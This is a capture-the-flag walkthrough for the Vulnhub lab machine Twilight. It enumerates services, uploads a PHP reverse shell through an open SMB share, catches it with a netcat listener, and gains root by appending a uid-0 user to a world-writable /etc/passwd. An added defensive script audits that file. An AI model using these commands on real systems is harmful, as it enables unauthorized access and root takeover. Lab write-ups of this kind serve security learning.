[VULNHUB] TWILIGHT

Today we are going to hack the Vulnhub machine called Twilight. You can download it from the following link: Sunset-Twilight

Enumeration


We start with an nmap scan to see which ports are open.

~ > nmap -A -p- 192.168.1.59
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-27 02:19 CEST
Nmap scan report for twilight.home (192.168.1.59)
Host is up (0.00032s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 43:e9:45:ec:f4:5b:ed:e9:64:47:43:43:39:96:9d:c9 (RSA)
|   256 ed:67:ad:31:04:17:ef:cf:75:02:05:db:88:94:97:a0 (ECDSA)
|_  256 ed:41:e5:d1:b2:23:2c:d5:90:59:2a:37:8b:da:31:c1 (ED25519)
25/tcp    open  smtp        Exim smtpd
| smtp-commands: twilight Hello twilight.home [192.168.1.111], SIZE 52428800, 8BITMIME, PIPELINING, CHUNKING, PRDR, HELP, 
|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP 
80/tcp    open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
2121/tcp  open  ftp         pyftpdlib 1.5.6
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 root     root           35 Jul 16 12:21 22253251-65325.twilight
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 192.168.1.59:2121
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
3306/tcp  open  mysql       MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
|   Thread ID: 39
|   Capabilities flags: 63486
|   Some Capabilities: LongColumnFlag, Support41Auth, ConnectWithDatabase, 
IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, 
DontAllowDatabaseTableColumn, SupportsTransactions, InteractiveClient, 
Speaks41ProtocolNew, FoundRows, SupportsCompression, IgnoreSigpipes, 
ODBCClient, SupportsLoadDataLocal, SupportsMultipleResults, 
SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: P8cjiTFC]*X]K@, NetBIOS MAC: 
 (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: twilight
|   NetBIOS computer name: TWILIGHT\x00
|   Domain name: \x00
|   FQDN: twilight
|_  System time: 2020-07-27T16:20:15-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-07-27T20:20:14
|_  start_date: N/A

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .

After skimming all the services, we take a closer look at Samba. We check whether it has any share that catches our eye.

~ > smbclient -L 192.168.1.59
Enter WORKGROUP\sml's password: 

	Sharename       Type      Comment
	---------       ----      -------
	WRKSHARE        Disk      Workplace Share. Do not access if not an employee.
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
SMB1 disabled -- no workgroup available

We see the WRKSHARE share, so we connect to it.

~ > smbclient \\\\192.168.1.59\\WRKSHARE
Enter WORKGROUP\sml's password: 
Try "help" to get a list of possible commands.
smb: \> 

Running "dir" shows that we are at the root of the filesystem. If we go to "/var/www/html" we find the same files that are served on port 80 :) With that in mind, we prepare a reverse shell.

~ > cp /usr/share/webshells/php/php-reverse-shell.php .
~ > mv php-reverse-shell.php rshell.php
~ > nano rshell.php # set our IP

Once it is ready, we upload it!

smb: \var\www\html\> put rshell.php
putting file rshell.php as \var\www\html\rshell.php (2683,0 kb/s) (average 1085,9 kb/s)
smb: \var\www\html\>

We set nc listening.

~ > nc -nlvp 1234
listening on [any] 1234 ...

And we visit http://192.168.1.59/rshell.php

Low Shell



~ > nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.1.111] from (UNKNOWN) [192.168.1.70] 59268
Linux twilight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
 10:51:53 up 4 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@twilight:/$

Privilege Escalation


Exploring the system, we notice that we can modify the file /etc/passwd.

www-data@twilight:/$ ls -l /etc/passwd
ls -l /etc/passwd
-rwxrwxrwx 1 root root 1594 Jul 16 09:34 /etc/passwd

We are going to add a user with root privileges to /etc/passwd. To do that we generate a password hash (for the password 123) on our own machine by running:

~ > openssl passwd -1 -salt new 123
$1$new$p7ptkEKU1HnaHpRtzNizS1

We append the user "lacashita" with root privileges and the hash we just created to /etc/passwd.

www-data@twilight:/$ echo "lacashita:\$1\$new\$p7ptkEKU1HnaHpRtzNizS1:0:0:ruut:/root:/bin/bash" >> /etc/passwd

We switch user!

www-data@twilight:/$ su lacashita
su lacashita
Password: 123
root@twilight:/# id
uid=0(root) gid=0(root) groups=0(root)
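
As an added defender's check (not part of the original write-up), this Python script flags the two things this step leaves behind in /etc/passwd, a second uid-0 account and a hash stored in the file itself, plus a helper for the world-writable mode that made the edit possible. The sample content is constructed; only the lacashita line mirrors the entry above.

```python
import stat

# Constructed sample /etc/passwd content (not taken from the machine): the
# stock entries plus one added uid-0 account that carries its hash inline,
# which is the state /etc/passwd is left in after the step above.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
lacashita:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:ruut:/root:/bin/bash
"""

def audit_passwd_content(text):
    """Return (username, reason) findings for entries that should not exist."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "malformed entry, expected 7 fields"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        # Any second uid-0 account is a full root-equivalent login.
        if uid == "0" and user != "root":
            findings.append((user, "uid 0 but not root"))
        # A real hash in field 2 bypasses /etc/shadow entirely.
        if pw not in ("x", "*", "") and not pw.startswith("!"):
            findings.append((user, "password hash stored in /etc/passwd"))
    return findings

def mode_allows_nonroot_write(st_mode):
    """True if a stat() mode grants write to group or others (the 0777 seen above)."""
    return bool(st_mode & (stat.S_IWGRP | stat.S_IWOTH))

if __name__ == "__main__":
    import os
    for finding in audit_passwd_content(SAMPLE_PASSWD):
        print("finding:", finding)
    if mode_allows_nonroot_write(os.stat("/etc/passwd").st_mode):
        print("/etc/passwd is writable by non-root users")
```

On a real host, feed it the contents of /etc/passwd instead of SAMPLE_PASSWD; the expected result on a healthy system is no findings and a mode of 0644.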

root.txt



root@twilight:/# cd /root
root@twilight:~# ls
root.txt
root@twilight:~# cat root.txt
(\ 
\'\ 
 \'\     __________  
 / '|   ()_________)
 \ '/    \ ~~~~~~~~ \
   \       \ ~~~~~~   \
   ==).      \__________\
  (__)       ()__________)


34d3ecb1bbd092bcb87954cee55d88d3

Thanks for playing! - Felipe Winsnes (@whitecr0wz)
root@twilight:~# 

End


And with that we are root on the machine.